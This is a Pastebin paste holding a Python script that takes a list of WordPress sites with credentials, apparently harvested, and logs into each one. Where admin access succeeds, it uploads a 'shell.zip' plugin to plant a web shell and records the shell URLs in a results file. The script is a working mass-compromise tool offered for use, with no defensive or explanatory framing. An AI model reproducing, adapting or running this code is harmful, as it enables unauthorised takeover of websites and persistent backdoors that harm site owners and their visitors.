API tools faq
paste
androxgh0st

wpapalah

androxgh0st
May 16th, 2020
237
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 3.41 KB | None | 0 0
raw download clone embed print report
  1. # -*- coding: utf-8 -*-
  2.  
  3. ''' androxgh0st - ga tau mau ngapain '''
  4.  
  5. import requests, re, urllib
  6. from requests.packages.urllib3.exceptions import InsecureRequestWarning
  7. requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
  8.  
  9. def main(url):
  10.     try:
  11.         print('\033[32;1m# \033[0m'+url)
  12.         plugins_name = 'shell.zip'
  13.         s = requests.Session()
  14.         urllogin = url.split('#')[0]
  15.         k = url.split("#")[1]
  16.         username = k.split("@")[0]
  17.         delete = k.split("@")[0]+"@"
  18.         password = k.replace(delete, '')
  19.         headers = {'user-agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0','Accept-Encoding' : 'none'}
  20.         payload = {'log': username,'pwd': password,'rememberme': 'forever','wp-submit': 'log In','redirect_to': urllogin + '/wp-admin/','testcookie': 1}
  21.         r = s.post(urllogin + '/wp-login.php', headers=headers, data=payload, allow_redirects=False, verify=False)
  22.         respon = s.get(urllogin+'/wp-admin/plugin-install.php?tab=upload', headers=headers)
  23.         if 'If you have a plugin in a .zip format, you may install it by uploading it here.' in respon.text:
  24.             print('Maybe it admin! try upload shell')
  25.             save_admin = open('wpadmin.txt','a')
  26.             save_admin.write(url+'\n')
  27.             save_admin.close()
  28.             try:
  29.                 look_for = 'name="_wpnonce" value="'
  30.                 nonceText = respon.text.split(look_for, 1)[1]
  31.                 nonce = nonceText[0:10]
  32.                 print('nonce: '+nonce)
  33.                 # upload
  34.                 # files = {'pluginzip': open(plugins_name, 'rb'),'_wpnonce': nonce,'_wp_http_referer': urllogin + '/wp-admin/plugin-install.php?tab=upload','install-plugin-submit': 'Install Now'}
  35.                 files = {'pluginzip': (open(plugins_name, 'rb')),'_wpnonce': (None, nonce),'_wp_http_referer': (None, urllogin + '/wp-admin/plugin-install.php?tab=upload'),'install-plugin-submit': (None,'Install Now')}
  36.                 try:
  37.                     r4 = s.post(urllogin + "/wp-admin/update.php?action=upload-plugin", headers=headers, files=files, verify=False)
  38.                     if 'Plugin installed successfully' in r4.text:
  39.                         fpath = re.findall('href="plugins.php?action=activate&plugin=(.*?)%2F(.*?)&_wpnonce="', r4.text)[0][0]
  40.                         print('Uploaded at /wp-content/plugins/'+fpath+'/')
  41.                         withsite = urllogin + '/wp-content/plugins/'+fpath+'/'
  42.                         save = open('wp_results.txt','a')
  43.                         save.write(withsite+'\n')
  44.                         save.close()
  45.                     if 'Destination folder already exists' in r4.text:
  46.                         fpath = re.findall('Destination folder already exists. (.*?)/wp-content/plugins/(.*?)/', r4.text)[0][1]
  47.                         print('Uploaded at /wp-content/plugins/'+fpath+'/')
  48.                         withsite = urllogin + '/wp-content/plugins/'+fpath+'/'
  49.                         save = open('wp_results.txt','a')
  50.                         save.write(withsite+'\n')
  51.                         save.close()
  52.                     else:
  53.                         print('Can\'t Upload plugins')
  54.                         save = open('try_manual.txt','a')
  55.                         save.write(url+'\n')
  56.                         save.close()
  57.                 except Exception as err:
  58.                     print('Can\'t Upload plugins')
  59.                     save = open('try_manual.txt','a')
  60.                     save.write(url+'\n')
  61.                     save.close()
  62.             except Exception as error:
  63.                     print('Can\'t get nonce value')
  64.                     save = open('try_manual.txt','a')
  65.                     save.write(url+'\n')
  66.                     save.close()
  67.         else:
  68.             print('Can\'t access plugins installer or not logged in !!!')
  69.             save = open('try_manual.txt','a')
  70.             save.write(url+'\n')
  71.             save.close()
  72.     except:
  73.         print('Can\'t access site !!!')
  74.         save = open('exceptions_url.txt','a')
  75.         save.write(url+'\n')
  76.         save.close()
  77.  
  78. f = open('results.txt').read()
  79. for target in f.splitlines():
  80.     main(target)
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!